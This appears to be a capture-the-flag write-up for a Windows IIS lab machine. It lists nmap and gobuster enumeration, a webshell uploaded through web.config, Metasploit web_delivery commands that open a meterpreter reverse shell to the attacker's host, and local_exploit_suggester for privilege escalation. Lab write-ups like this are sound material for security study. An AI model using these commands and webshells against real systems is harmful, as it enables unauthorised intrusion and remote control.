Difficulty: Eazy Machine Creator: mrb3n Tools Used:
NMAP Gobuster Metasploit
Task: To find User.txt and Root.txt
Network Enumeration
Let’s start with a simple NMAP scan to discover open ports and services.
nmap -A 10.10.10.93
GoBuster
Using Gobuster, we can perform a directory scan. This host is a windows IIS server so we can add the extensions of .aspx,.html.
gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html
Remote Code Execution (RCE)
Webshell
Since we can upload a web.config file, we should be able to upload a web shell in the config file.
https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asphttps://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
Web Delivery Meterperter Shell
We need to build our exploit from Metasploit using the web delivery script.
msf use exploit/multi/script/web_deliverymsf exploit(multi/script/web_delivery) set srvhost 10.10.14.2msf exploit(multi/script/web_delivery) set target 2msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcpmsf exploit(multi/script/web_delivery) set lhost 10.10.14.2msf exploit(multi/script/web_delivery) run
Meterperter Shell
User.txt
Privilege Escalation
Now we need to get system level session to get the root.txt we can use the recon local_exploit_suggester module in Metasploit.
msf use post/multi/recon/local_exploit_suggester msf set session 2 msf run
Privilege Escalation Exploit
Root.txt
